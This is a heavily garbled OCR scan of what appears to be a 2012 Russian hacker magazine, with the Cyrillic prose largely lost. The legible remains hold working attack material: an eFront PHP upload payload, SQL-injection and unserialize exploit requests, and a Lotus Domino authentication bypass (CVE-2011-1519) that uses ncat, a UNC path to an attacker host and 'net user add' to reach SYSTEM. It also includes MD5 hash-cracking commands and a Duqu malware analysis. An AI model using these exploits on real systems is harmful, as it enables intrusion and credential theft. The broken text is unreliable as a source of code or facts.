sub _3 0199E55.

EOF
BOF

= worksheet
Sheet records

, ,
,

EOF

.text:esF8e
.text:e5F835

ID

.text:e5F838

( )

sz

( )

.text:e5F844

.text:e5F849

(ID ] - .

.t ext:e5F84 F

. text:e5F856

: BOF IBegi Of File] EOF IEd Of Fil e].

.text:e5F858

.text:e 5 F85E

BOF, :

.text:e5F862

.text:e5F867

BOF , BIFF8
.

2
4

12

~;

. text:e5F869

2
2
2
2
2
2
4
4

89

ID

.text : e5F86A

01

. text:e5F86C

f'

.text:e5F86E

***.fc H

. text:e5F86F

ID

.text:e5F872

call su_11
mov , [ebp+var_EDC]
imul , [ebp+var_Fee]
mov edi,
mov , [ebp+var_EEe]
lea , [ + + ]
call su_ l
push eFFFFFFFDh
edx
sub edx,
add , edx
push ; Dst
push ; int
mov , edi
call sub_e199E55

F-:

.text:e5F87e

.text:e5F83E jz l_54488

(sz

call su_11
cmp , h
mov [ebp+var_ED4] ,

Excel,

sub_30199E55

,
. ,
.

- Workbook globals


public static function checkFile($name) {
    if ($GLOBALS['configuration']['file_black_list'] != '') {
        $blacklist = explode(",", $GLOBALS['configuration']['file_black_list']);
    } else {
        $blacklist = array();
    }
    $blacklist[] = 'php';

    $extension = pathinfo($name, PATHINFO_EXTENSION);
    foreach ($blacklist as $value) {
        if ($extension == trim(mb_strtolower($value))) {
            throw new EfrontFileException(_YOUCANNOTUPLOADFILESWITHTHISEXTENSION.': '.$extension, EfrontFileException::FILE_IN_BLACK_LIST);

CheckFilell

.text:30199E0

.text:30199E4

-. n

cmp edi, [e sp+4+Dst]


ja loc_303EE1B7
.te xt:30199 E A mov , [esp+4+arg_0]
.text:30199EE push
.text:30 199E F mov , dword_30F72C0
. text:30199E75 push
.text : 30199E7 mov , nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+ l0h+Dst],

, n

.
, .

memcp y,

nepen

, / GS . ,
esp .
,

ca ll esp .
mov , [esp+l0h+Dst]
push esi ; Size
lea edx, dword_30FEB8[ebx]
push edx ; Src
push ; Dst
sub edi, esi
call memcpy
add [esp+lCh+Dst], esi
add , esi
.tex t :0 199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text : 30199EB2 mov dword_30F72C0,
.text:30199EB8 jnz loc_301E0DB

. text:30199E93
.text:30199E97
. text:30199E98
.text :30199E9E
.text:30199E9F
. text:30199EA0
.text :30199EA2
. text:30199EA7
.text:30199EAB

i(.1;ldfifi
Microsoft Office Excel 2007 / Microsoft Office Excel 2007 SP2.

,_i,J!IiitJ:I
, .

MS11-077 Win32k Null Pointer De-reference Vulnerability
~2

CVSSV 2


[AVL/AC:L/Au:N/C:C/1 /)

1]]
,
.

: 22011 .
:

KiDebug.
CVE: CVE-2011-1985.

/ GS / SAFESEH . , /GS-

wi n32k.sys ,

MS Visual Studio,

, .

>> n.

,
.

IJ34!Jii

cookie,

.
64-

, ,

coo kie. , ,
. -

. /S AFESEH
S- .
,
, n

. ,

. Visual Studio

/ SAFESEH


.text:BF9140C0 ; _stdcall NtUserfniNCBOXSTRING(x,x,x,x,x,x,x)


.text:BF9140C0 _NtUserfniNCBOXSTRING@28 proc near
CODE XREF: xxxDefWindowProc(xJx,x,x)+E [ p
. text:BF9140C0
NtUseressageCall(x,x,x,x,x,x,x)+l[p
.text:BF9140C0
.text :BF9140C0 WND
dword ptr 8
. text :BF9140C0 arg_4
dword ptr 0Ch
.text:BF9140C0 arg_8
dword ptr 10h
.text:BF9140C0 arg_C
dword ptr 14h
.text:BF9140C0 arg_10
dword ptr 18h
dword ptr lCh
.text:BF9140C0 arg_14
dword ptr 20h
.text:BF9140C0 arg_18


- BSoD:

RETURIJ t o

EXCEL . O II OEE

frooo

f:L .7

14

CB_SELECSTRING

exe14D

CB_FINDSTRINGEXACT
LB_ADDSTRING
LB_INSERTSTRING
LB_SELECTSTRING
LB_FINDSTRING
LB_FINDSTRINGEXACT
LB_INSERTSTRINGUPPER
LB_INSERTSTRINGLOWER
LB_ADDSTRINGUPPER
LB_ADDSTRINGLOWER

1s

14

14

11
1

exelBF
12

exelAA
l
1

exelAD

.,.,,Jdjfi

.text:BF914ece
.text:BF914ece
.text:BF9148C2
.text:BF9 14eC

. text : BF9148CS
; WND
.text:BF9148C8

CB_ADDSTRING
CB_INSERTSTRING
CB_FINDSTRING

==

mov
edi, edi
push

mov
, esp
mov , [ebp+WND)
exffffffff (-1),
mov , [ecx+2eh )

Windows SP3/XP SP2 64, Windows 2003 Sv SP21+ itanium,x64l,


Windows Vista SP2/ SP2 64 , Windows Sv 2008 SP2 32/64/
itan ium, Windows 7 32 / 64 , Windows 7 SP1 32/64, Windows Sv
2008 2 x64/i tanium, 2 spl x64/itan ium .
BSOD

f"jJ!IijiJ:I
MSll-077, .

NtUs e MessageCall NtUsefniNCBOXSTRING


, CB _ ADDSTRING:

.text :B F88 EE6B ; i nt __stdcall NtUserMessageCall(int,


int, int UnicodeString, PVOID Address, int, int, int)
.text:B F88EEB1
push
[ebp+arg_18)
; int
movzx
, ds:_MessageTae[eax]
.text:BF88 EEB4
push

int
.text:BF88EEBB
[ebp+arg_le)
int
.text:BF88 EEBC
push
. text: BF88 EE BF
and
, Fh
. text : BF88EEC2
push
[ ebp+Address]
Address
.text :BF 88EECS
push
[ebp+UnicodeString] ; int
. text: BF 88E EC 8
push
[ ebp+arg_4]
; int
. t ext: BF 88EECB
push
esi
; int
. text : BF 88E ECC
ca l l
ds:_gapfnMessageCall[eax*4 )
; NtUserfniNSTRINGNULL(x,x,x,x,x,x,x)

Wordpress

Zingiri Web Shop Plugin

CVSSV2

~5


I:N/ AC:L /Au:N / C: / 1: P/ A:PI

l1

WodP e ss
.
, ,

.
- -,-


,
.

Egidio Romano aka EgiX. EgiX


13 ,
,

. rdat a:BF998D68 _gapfnessageCall dd offset _NtUserfnNCDESTROY@28


.rdata :BF998D68
; DATA XREF: NtUseressageCall(x,x,x,x,x,x,x)
. rdat a : BF99eD68
; NtUserfnNCDESTROY(x, x,x,x,x,x,x)
.rdata : BF998D6C
dd offset _NtUserfnNCDESTROY@28
; NtUserfnNCDESTROY(x,x,x,x,x, x,x)
.rdata:BF998D7e
dd offset _NtUserfniNLPCREATESTRUCT@28
; NtUserfniN LPCREATESTRUC(x,x,x,x , x,x,x)
. rdat a: BF998DD4
dd offset _NtUserfniNCBOXSTRING@28
; NtUserfniNCOXSTRING(x,x,x,x,x , x,x)

IJ:J4!Jii

/fws/addons/
t i m e/j sc i t s/t i _ m 1 1u g i s/ j f i 1 ma g 1 j _ s ave _
name.php, 37-56
.

$selectedDocuments POST - value.


$selectedDocuments
displayAayll witelnfoll,
, $selectedDocuments.
witelnfoll , /fws/addons/

t i m /j s i t s/t i _ m / 1u g i s/ j f i 1 ma g 1 j _ t _

folde.php:

SendMessageCallback((HWND)- l ,CB_ADDSTRING, e, e, e, e );

SendNotifyMessage((HWND)- l ,CB_ADDSTRING, e, e );

function writeInfo($data, $die = false)
{
    $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');
    @fwrite($fp, $data);


if ($_POST['templateName']) {
    $dir = '../../../../content/editor_templates/'.$_SESSION['s_login'];
    if (!is_dir($dir) && !mkdir($dir, 0755)) {
        throw new Exception(_COULDNOTCREATEDIRECTORY);
    }
    $filename = $dir.'/'.$_POST['templateName'].'.html';
    $templateContent = $_POST['templateContent'];
    if (file_exists($filename) === false) {
        $ok = file_put_contents($filename, $templateContent);
        chmod($filename, 0644);

GetUserTimeTargetll

, file_put_

contents() $_POST[ 'templateName' ] $_


POST[ 'templateContent' ] , . ,

    @fwrite($fp, "\n\n" . date('d/M/Y H:i:s'));
    @fclose($fp);

, ,

!

data.php,

php,
magic_quotes_gpc. ,

, :

-.

ex pl oit- db .co m

!EDB-10: 18111].


.
,
, :

11 Arch Li nux
# pacman -5 php
/ / Debian- ba sed
# apt-get install php

POST /efront/www/editor/tiny_mce /plugins/


save_template/save_template.php /1.1
Host: localhost
Content-Length:
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
templateName=sh.php%ee&templateContent=
< ?php evil_code(); ?>
2. .
checkFile[], /libaies/filesystem.
class.php, 3143-3154

. FileSystemTee::uploadFile!l,
, hkFil[]

$ php 18111.php <host> <path>

. , ,
<host>- ,

<path>- WodPess.

file_ack_list,

Joomla!, -
CONFIG_SYS_ROOT_PATH.

if1;1d:Jfi

php, php3, jsp, asp, cgi, pl, , ,


bat.
php.

3. SQL- UPDATE.
getUseTimeTaget[], /libaies/

Wordpress Zingiri Web Shop Plugin 0.9.12 2.2.3.

tools.php : .

fil!iijiB'

'

2.2 .4 .

package_l ,
$entity. , /www/
peiod ic_ u pdate.php:

eFront
~5

CVSSV2
[AV: N/AC:L/Au: N/C:P/1: /:]

IIJj]
EgiX

eFont.
,

, .

f:JQ!Iii
1. .
/www / d i to /t i ny_ m / 1ug i s/save _ te m 1 te/s ave _ te m 1 te. h
! 8-18]:


if ($_SESSION['s_login']) {
    $entity = getUserTimeTarget($_GET['HTTP_REFERER']);
    //$entity = $_SESSION['s_time_target'];
    //Update times for this entity
    $result = eF_executeNew("update user_times set time=time+(" . time() .
        "-timestamp_now),timestamp_now=" . time() .
        " where session_expired = 0 and session_custom_identifier = '" .
        $_SESSION['s_custom_identifier'] .
        "' and users_LOGIN = '" . $_SESSION['s_login'] .
        "' and entity = '" . current($entity) .
        "' and entity_id = '" . key($entity) . "'");


, $_G['_REFERER'],
getUseTimeTagetl l ,

eF_executeNew ll . ,
SQL- URL
:

http:/ / localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]

$_SERVER('HP_REFER ER '], , -,
.
.

4.

/www/index.php:

if (isset($_COOKIE['cookie_login']) && isset($_COOKIE['cookie_password'])) {
    try {
        $user = EfrontUserFactory::factory($_COOKIE['cookie_login']);
        $user->login($_COOKIE['cookie_password'], true);

$_COOK IE ['cookie_login'J.

EfontU serFactory::factoyll,
,
:

GET /efro nt /www/index.p hp /1.1


Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_
login=administrator;cookie_login=1;cookie_password=1
Connection : keep-alive
5.

-.

/www/s tudent.php:

if (isset($_GET['course']) || isset($_GET['from_course'])) {
    if ($_GET['course']) {
        $course = new EfrontCourse($_GET['course']);
    } else {
        $course = new EfrontCourse($_GET['from_course']);
    }
    $eligibility = $course->checkRules($_SESSION['s_login']);


, $_GET['couse'] $_GE[ 'from _


couse'J.

EfrontCourse,

evalll :

/s tudent.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1];
phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}

if.1;1dJt1

Ft <= 3.6.1 [build

119441.

,_1,J!Iii[I:J
. ::::


[iog.chivavas.org[

I
4850
2 n
2,2

!

Radeon

bjt.Jy/yEhdi

RainbowCac k n
n ! .

bjt.[y/viSB9K -

n
~>

MD5

MD5.

,
. -,
,


,
.

, ,

MD5.


:
,
. ,

.

. -

l
l
, . .

MD5

MD5.

1 28-

. , 1 28-
, .

1991
MD4 .
1992 RFC 1321. MD5
, CMS
-

- SS L-.
,

1993

MD5

, . ,
1996-, ,

MD5.

SHA1 [

, ,

SHA21 RIPEMD-160.

MD5 1 2004 .
MD5CRK -

CetainKey Cy ptosystems

.
- .

24 2004

, - ,


Keccak

Skein.

2008

NIST

SHA1 SHA2.
BLAKE, Gostl, JH,


- : d8578edf8458ceefbc5b76a


MD5


GHASHGPU:

GPU

5854.


lghashgpu,

www.golubev.com

DS-

.
xe a , lghashgpu

GPU,

Vid ia ATI CUDA/

ATI Steam . n
, CPU,
.

GPU ,

. , :

Windows:

ighashgpu.exe -t:md5 \
-h:d8578edf8458ceefbc5b6a58c5ca4 -max:7

MDS

MD5.

- [qwetyl.
,

, - ,

. dllfd4559815b2c3delb685b

86283, , ,

<<_admi .

IBM 690 [ ,

, :

].:-] 2005
.

ighashgpu.exe

. 509

-u:[abcdefghijklmopqrstuwvxyz1234567890_]

-h:dllfd4559815b2c3delb685b8a6283

-t:md5

-m:??????_admi

, .
,

.
.

2006

2006

'-u'

, !

2008

'-m'

<<_admin >>.

Chaos Communication Congess


. 509.

MD5.

2007 ,
Sony Pla yStat io MD5.
: 1,4 D5-
! , 2009-, BlackHat
USA GPU ,

, -

n ,

n .

. ,
. ,

2011 IETF RFC 1321 [MD51


RFC 2104 [HMAC-MD51 . RFC 6151.
MD5

<< ,

. ,

- , .

<< - ,

MD5 . ,

MD5

, ,

. ,
, .


126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. ,


, .

MD5

,
.

ecrypted.dat

. 80- ,

IGHASHGPU:

, 640 1 ,

. ,

. ,

. ,

cOOI:

2003 , , ,

f48494761d277762

f2da2e2a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89ae4a9d94dacf

-.

9478151927242f5

- << >> .

eea931d3facaad384169ebc31d38775c

49d854799ff9f8458

- [ ,
encypted.dat lghashgpu
:

64 ).
, .
. ,

ighashgpu.exe -t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] -m:??????ceel encrypted.dat


. ,

.
lghashgpu
ighashgpu _ esults.txt :

, n <<>>
. .
, n

feb46ac8494761ad2eaa7776c2a:1rootxceel

. ,

f2da2e2a5a21Sb6699Sde1f9327dbaa:pwd12xceel

c7f7a34bbe8f385faa89ae4a9d94dacf:pwd34yceel

. << >>

ccb9a4e7eBa151ec927e242feacS:pwd56yceel

4966d8547ccee99aeffe9f6845Be:pwd9Bzceel

eea931d3facaad384169ebc31d38775c:pwd78zceel

, .

IGHASHGPU:

n n>> .
, :

var plain = password + "s41t";
var hash = md5(plain);
: 42151cf2ff27c5181bb36a8b
cfafea7b.
lghashgpu << >> <<-asalt >>:

ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] \
-asalt:s41t

RainbowCack l poject-a i nbowcack . com ) ,


Windows,

RAINBOW TABLES
<< >> - ,


85-99%.


MD5

Linux . n : LN /
NTLM, MD5 SHA1. ,
- .
<<

MD5.

n: , ,
. n n F

Rainbow

s [ f eea i bow t aies.co m ) . , n


,

,
>> .

MD5, SHA1, LM

NTLM.

,
>>

. :

SHA1-

200

LN/NTLM, MD5

.
tg, RainbowCack. n
:

hash _algo ithm-aop

[LM, NTLM, MD5

SHA1);
chaset- ,
c haset . txt;
plaite xt_le_m i

plaintext_len_max-

tae_idex, chain_le, chain_um t_ind-

, [it.ly/dT8M).
n:

1.

tae_index- >> ,
.

, .

2.
3.

chain_le- n .

>> .

hin_um- n .

n .

4.

pat_index-o , .

MDCa ck, CPU [


).
GPU [nVidia GeFoce GT 220), CPU [lntel Atom N450,

0).

>>

MD5:

) ~

GPU

CPU

4
5

ee:ee:el

ee : ee:el

::l

::

: :9

: :l

::l

ee:es:21

: : 1

. ltel

ee::ll

9:27:52

::4

rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0

Atom N450
:). md5_
lowealpha-numeic#1-7_0_200097505489 _.t 1,5 .
,

,
,

GPU

CPU

>> .

. n

tsot.exe:

rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt

. ,

4-

5- ,

n .
l

. :

. ,

d8578edf8458ceefbc5ba58c5ca4. cack_gui.exe

- .

Add Hash ...

File .

. >> .
Seach

Rainbow s ...

Rainbow .

md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt,
Open. n !
.


.
- , ,

MD5

SHA1.

SHA2 S
[ ). - ,
.

VS. CPU VS. GPU

, ,

>> .

lghashgpu

- ,

n D5- , ,

. ,

RainbowCack


100 %,

. ::::


Digital Security ltwitter.co m/asin tsovl

Lotus,

IBM Lotus
Domino Server
-

IBM Lotus
Software,

IBM Lotus

Notes.

www.zerodayinitiative.com - ZDI;
www.ibm.com/software/ru/lotus/ - IBM Lotus Software;
bugtraq.ru - BugTraq;


LOTUS DOMINO CONTROLLER

dj.navexDress.com -

DJ Java Decompiler.

, ,
,

.

.

IBM,

.
, ,
. .

Lotus

Lotus.

: , , . . ,

, .
.
- ,

.: ]

,
.

, ,

, .

Lotus

CVE-2011-1519

[ , ]. ,

. : ]

- , ,

ames.nsf - .

, ,

8.5.2FP2.

exploit-db.com

Lotus

ZD I ZDI-11-110,
Oday ( ].

<<

Lotus Domino S v

tll.

BugTaq ,

ZDI,

IBM suit-

, -

2050.

, ,

COOKIEFILE,


Lotus,

fotunec i ty. com/neshkov/dj . htm l l, j- :\

gm Files\IBM\Lotus\Domino\Data\domino\java\dconsole.ja

UNC,

n Jv- .

. ,

, NewCiient.class,

SYSTEM>>.

~ COOKIEFILE

, \\evi lhost\passwod _coo kie_file,

11 sl-

if (s1.equals("#EXIT"))
    return 2;

, ,

2ese/tcp

if (s1.equals("#COOKIEFILE"))
if (stringtokenizer.hasMoreTokens())

11
, ,

2050.

// #COOKIEFILE < n >


cookieFilename = stringtokenizer.nextToken().trim();
return 7;

, Lotus .
.
, .

, ,

if (!s1.equals("#UI"))
if (stringtokenizer.hasMoreTokens())
// ...
usr = stringtokenizer.nextToken(",").trim();
if (usr == null)
    return 4;
if (stringtokenizer.hasMoreTokens())

,
nmap.
Ltus-,
, ,
.

11
socket:reconnect_ssl()

pwd = stringtokenizer.nextToken().trim();
return ;

socket:send("#API\n")
socket:send(("#UI %s,%s\n"):format(user, pass))
socket:receive_lines(1)

.
:

socket:send("#EXIT\n")

/*
, Ltus-

*/

do {

: SSL- ,
#>>. ,

/ / ReadFromUser-
int i = ReadFromUser();

admin pass
#UI admin,pass.
, ,

nmap

COOKIEFILE . ,

i f (i == ) { // #APPLET
appletConnection = true ;
continue ;

, #COOKIEFILE \\evil\
file. , ,
[ ,

! .

userinfo = UserManager.findUser(usr);
if (userinfo == null) {
    // ... !
    WriteToUser("NOT_REG_ADMIN");
    continue;

. ,

Java, IDA , -

. DJ decompile [ membes .

if (!appletConnection)
    // #APPLET,
    flag = vrfyPwd.verifyUserPassword(pwd, userinfo.userPWD());
else // #APPLET
    // COOKIE? !
    flag = verifyAppletUserCookie(usr, pwd);
} while (true); // end loop
if (flag) // ,
// , !

,
#APPLET
#UI #COOKIEFILE. ,
, ,
Nt-


admindata.xml. , no n,
[ NOT_REG_ADMIN !'

LOAD CMD.exe
BeginData

net user add username password /ADD

<<
. n
n

#APPLET ,

adm, n

cookie .

~.

n #UI, n

veifyAppletUseCookie:

, #COOKIEFILE.
,

//#COOKIEFILE <cookieFilename>
if (cookieFilename == null || cookieFilename.length() == 0)
    return flag;

/ / - !

File file = new File(cookieFilename);

#EX IT

,
' ? n
,
LOAD, n
n.

inputstreamreader = new InputStreamReader(
    new FileInputStream(file), "UTF8");

,
n . , IBM
LOAD

// s7do {

if ((j

cookieFilename

, n.
, m-, n , n

s7.indexOf( "<user " , j)) <= ) break ;

. LOAD
n , n n

String s2 = getStringToken(s7, "user=\"", "\"", j, k);
String s3 = getStringToken(s7, "cookie=\"", "\"", j, k);
String s4 = getStringToken(s7, "address=\"", "\"", j, k);
if (s5.equalsIgnoreCase(s2) && s6.equalsIgnoreCase(s3)
    && appletUserAddress.equalsIgnoreCase(s4)) {
    flag = true; break;

ncat --ssl tagetlotus_host


#API

25

#L

#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#

$whoami
whoamiBeginData

while ( true );
, n
usename, passwod addess usename, passwod

Microsoft Windows [Version 6. 1 .761]


Copyright () 2eeg Microsoft Corporation. Al l rights reserved.

addess cookiefile, ,
n n' ,
:

1.

<us> .

2. usename, passwod, addess.

3.

4.

n ,

C:\Lotus\Domino\data>
n , n

n .

, n

#API , API Jv-, -


, ncat . ,
Lotus ,
n SMBRelay.

CVE-2011-1519
.

1.

C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM

cookie.xml:

?
<user name="usr" cookie="psw" address="dsecrg">

, . ?

, -. - ,
n, usr .

2.

n ,

, n \\fileserver\public\cookie.xml.

3.

n ncat:


ncat --ssl targetlotus_host


#API

25

#L


#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#


Lotu s,

S- ? ,

, UNC (
, !.
,
- . , IBM

, : cookiefile
.>> . ,

- \\evil\cookie\file,

1.

, : .\\evil\cookie\
file, UNC . ,

. , ,

SSL-,

[,

i,

ARP-POI SONING,

DoS -

mail . u l.

IBM! , cookief il e,
, - L-

2.

, .

L- . XM L,

- , [

' , , IBM,

l. ,
, ,

L- :

, ,

<?xml version="1.0" encoding="UTF-8"?>
<user name="admin" cookie="dsecrg" address="dsecrg">

[,

.
Bla-a-a<user

! - ,
- ,

name="admin" xXXxcookie="dsecrg" Xaddress="dsecrg"NYA>
4.
>>

Java 6

ASLRI.

. .

. , , ,

1.

99

cookievalues Microsoft I

service ( \\n- Entel:

ncat targethost 49152


GET /<user HTTP/1.0\r\n
\r\n

HP/1.0\r\n

#APPLET
#COOKIEFILE .. \ .. \ .. \windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass

\r\n

ncat targethost 49152


GET /user= "admin"cookie="pass"address="http :// site.com"

2. - :
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16

$whoami
NT AUTHORITY/5YSTEM

UNC,

2011-08-26 11:53:30 10.10.10.181 52902 10.10.9.9 47001 HTTP/1.0 GET <user 404 - NotFound
2011-08-26 11:53:30 10.10.10.181 52905 10.10.9.9 47001 HTTP/1.0 GET name="admin"cookie="pass"address="http://site.com"> 404 - NotFound -

- .

. -,
,
, .

: IBM

-, .

<user >> ,

-, ,

%20>> [ , !. ,

- [

, <use r >>

, LOAD TELL

( 404 NotFoudl .

!. -

3. ,
-, :

admidata . xml.

MD5. ,
4, 25 26 ,

ncat --ssl tagetlotus_host 2050

. ,

#!

, ' I


Mar licq 884888, http://snipper.rul

scarletO

....
-
""""'

bit .ly/t l56m2


:

URL:

Windows

3. 14.y/r u/md5

Windows

URL:

......,...
,.,

. "'

Win dows

cel1697i845
URL:

bit.ly/v mJ2g8


MSSQ L lnjection Helper-

, n

SQL-

D5-

.
,

, -

MSSQL.

BarsWF- World Fastest MD5 cracker.

n n

n ,

, ,

n SQL-.

5-

? n

. ?

npor :

Brutus hashes. New generation>>

'

Microsoft

SQL Server;

GUI-

, ,

, ;

MD5;

, ,

u :

1.
2.

1.

. n,

Quad QX6700 [3,01 GHzl


200 n

3.

'

4.

'

MSSQL lnj ection Helper

,
,

URL
[, site .com/script.asp?id =11
.

2.

lntel 2

Radeon:
AMD BROOK,
CUDA
NVidia.

:-1

072

n;


, n .
n
.

,
.

6 131 066 257 801

01/156/2012

X-Tools

PANBu ste - ,

Mastecad, Ameican E xpess,

, l

:
Security

! .

1000 BINI;

PAN
My5QL, M55QL l-l,
P ostge5 QL , Exce l, VMwae VM DK, l

PAN ! ! .

!);

PCI 055,

, PANBuste

I.ZIP,

.GZ, .TGZI;

PCI Q5A,

Research Labs
URL:
www.xmco.fr/
panbuster.html

.
: -

*nix/win/mac

JCB, D iscove,

Chia Unionl;
!

Windows,

L i u x,

05 ;

IV15A,

:
I

1./pabuste
-1 ../1 ,
!
- -! .

YGN Ethical Hacker


Group
URL:

URL:
bit.ly/vZbhcN
:

it.ly/vDpEtB

Windows

SuRGeoNix
URL:

~ ----..

it.ly/IXxlkm

=-

Windows

*nix/win
'~

WEBSURGERV, _ __

OWA5P Joomlal Vulneability 5canne-

W5'

, sn- . ,

. ,

, 55,

Joomlal

Web5ugey : -,

5QL-

. ,

Do5

WAF,

- .

. , DDM g -

- .

sn-

n,

WAF

5Q L-.

vuln.php,

1. n llnitial Requestl:

5- .

HTML-

! ,

);

My5QL

GET /vu ln.php?id=


HOST : 1.2.3.4
2.

/1.1

IList Configuationl :
- 1 32l MD5-

DDMg

xe al, -

. :

.
,

3.
joomscan.pl -u http://joomla-site.com/ \
-x proxy:port


GET /vuln.php?id=1+and+'${List_2}'=substring((select+password+from+admin+limit+1),${List_1},1) HTTP/1.1
HOST: 1.2.3.4


, ? H ackespace

hackspace- ,

. ,

>>

I.

n .

. ,

n, ,

, ,

, , .

, ,

- ,

, >>

n . ,

, ,

, . -

, n

do it youself

[ ]. , -

{neuron}

.


,


.
,

,
-

,
.
,,


:1.


,
,
-
,

. ,
,
ha ck e s pa c es.og ,
,
. - ---

.
, ! .

<< ,

.
,
>> ,- ,


Nu

l n e u o nsp ac e . u ).
<<
. ,

FOSS Labs

C-Base. n !

:
, ,

-,

, ,

N u

! ,

, -. ,

- ,

<< :

leSage lab,

, , ,

, ,

. ,

. ,

30-50

1000-1500

. ,

, -

, - ,

, -

, , ,

- : D- ,

. ,

, ,


C-base

London Hackspace (LHC)

NYC Resistor

: www.c -base .org.

: londo n.hackspace .org .uk .

n : , .

n: , .

n: , - .

: 300+.
:

: 300+.
:

: 30+.

5 .

076

17 .

C-base

1995 .

2009 ,

www.nycresistor.com .

11

RESISTOR

$75-115.

NYC Resisto-o

2008 .


], IFaiwaves, ]

leSage laI .


. , ,
f-J>>,
,
.
, , , ,



, .
- ,
, ,


. ,


, .

. ,

htI/www ISJ!Dtrk,ac

cpmrf

Novernt>.r

, ,

, - , ... ,

:]. ,

2011

, .
Nu

u s . u .

. ,

!
30-]. Nu

dui. ,

, , .

. ,

! -

<<

Softwae Defied

, , , :

WiMAX GS

. ,

?.

D-. ,

, ,

. ,

Nu,

Radio,

15-17 .

15 ,
150,

, .

,

iberpipa

Metalab

: www.kiberoipa .org .
: , .
: 20 40 ,
n.

Ca : www. metalab . at .
: , .
: 130+.
:

>> -

!
, ,
,

20 .

: .

18'.

kiberpipa

___:_ _ _ _ _ __.J

. , 2001

2006 .

, ,

-.


, !,

Metalab

].

>>,
!
- HackSpace Sait-Petesbug,- -

077

.
- .
,
.

<< : -

3D-, ,
n , , n
3D- -
.

,
~

, , ,

n ( hackspace-spb.u ].

n .

,
,

, (

(polakumekay.
com]. ,

29 .- .

, . n,

Mifill] : , -

: <<

. -

. ,

40 . -

, .

. : ,

. ,

, .

( ]

. ,

, .

, ,

n C-Base, , ,


. ,
,

[Space Foundation

, !,
,
,
~
. ,
, .

Neuon .

100 .
120 .

[ !,
.
<< :
.
, ,

. n

NYC Resistor

. ,

. , ,

, , ,

:1.

-,

,-2.

[, -

Neuon n

$50-100,

, !,

n .

[, ,

, n

10-30 !. ,

. , ,

- ,

- ,

, ,

- .

C-Base

, ,

300.

- . C-base

HackSpace-SPb

. ,

, ,

, .

, .
?

~
, , <<

, ,

Space Foudatio, -

. :::

? .

-
-

NYC Resisto.

, , MakeBot,

30-.
-

30 .

. ,
-
.-

NYC Resistopoca:

. ,

. :1
,
, ,

. ,
,


200-300 -

079

MALWARE

Senior malware researcher, ESET

.....

Stuxnet

IDA

Stuxnet,


. ...

WIN32/DUQU:
Certificate

- . -

General 1Details 1Certification Path 1

STUXNET

~ Certificate lnformation

This certificate is intended for the following purpose(s):


Ensures software came from software puiisher
Protects software from alteration after puiication
,

RSS- .

* Refer to the certification authority's statement for details.


Issued to:

-Media

Stuxnet ...

. ,

Electronics Incorporation

Symantec,

, - , - -

sh

Issued : VeriSign Class 3 Code Signing 2009-2

Stuxnet

Duqu. ,
Stuxnet. , Duqu

Yalid from 8/2/2009 to 8/2/2012

, Stuxet.

=1

Instal Certificate ..

Cyptogaphy

Issuer Statement

and System Secuity (CySyS].


Duqu, Stuxnet,

. , CySyS
-

080

Duqu

, .

1. - !


[Figure: certificate verification result. Common Name: C-Media Electronics Incorporation; Status: Revoked; Validity (GMT): Aug 2009 - Aug 2, 2012; City/Location: Taipei. The accompanying disassembly listing is not recoverable.]

.2. .

4. n

IU:teiiiili

Duqu

5.

Stuxet

, .

cmi4432.sys,

, ,

, VeiSign

Duqu,

Stuxet,

C-Media Electonics lnc. ,

2012 ! 1].


Duqu :
0) d-,
, CVE-2011-3402.
1) -

. ,

.

w i32k. sys.

2) -,

DUQU

,
,

3)
4)

Duqu

3.

, .

n ,

sevices .e xe

. ,

Duqu

. .

n , .

Duqu

Stuxet .

Duqu

4.

-, .

Duqu

, , ,

, -

Name

Stuxnet.

5
Stu xnet, 6- Duqu .

Size

LJ 566168ff21437205807

LJ Oeecd17621535878724fd800

LJ 94c4ef91dfcd0c53a96fdc387f9f9c35

LJ 4541e850a228eb69fd0f0e92462445

u 9749d38ae9b9ddd81b50aad679ee87 *
b4ac366e24204d821376653279cbad86 *
u e8d6b4dadb9ddb58775e6c85O6cc *

192,512
24,960
6,750
29,568
85,504
232,448
6,750

[,

) : , ,
, , , , , , .
, .
, ,

Duqu

Stuxet.

,
. ,

,

. .

01/156/2012

Stuxet,

Duqu.

081

MALWARE

, .

Win32/Duqu,
n,
n .

, n , n n
n n .
,

Duqu

, !
, !.

. ,
.

7. n

main.dlliocoo
Duqul,

U-.

def dec rypt( data) :


gamma = (02,

7 ,

n .
072, 073,

034, 099,

0x7l,

098, 0)

= 0

<<Duqu: the

for ix in xrange(len(data)) :
data ( ix] = ga!.ma ()
= + l
if == 7:

us

to the next Stuxnet>>

36

. ,

n ! 81.

=0

, ,
, , n -

8.

time of infection
to live
.

9.

time of infection
to live
.

10.

14.10.2011

1.11.2011

3.11.2011

4.11.2011

Duqu: the precursor to the t Stuxnet>>,

Microsoft Security Advisory 126396581,

!, ,

!.

Win32/Duqu.

CrySyS

19.10.2011

ICVE-

CVE-2011-3402
Microsoft
Active Protections Program
IMAPPI.

2011-34021,

wi32k.sys

CrySyS, Symatec
Microsoft .

CrySyS.

TrueType .

,
.


11. RPC Duqu

( )

, ,

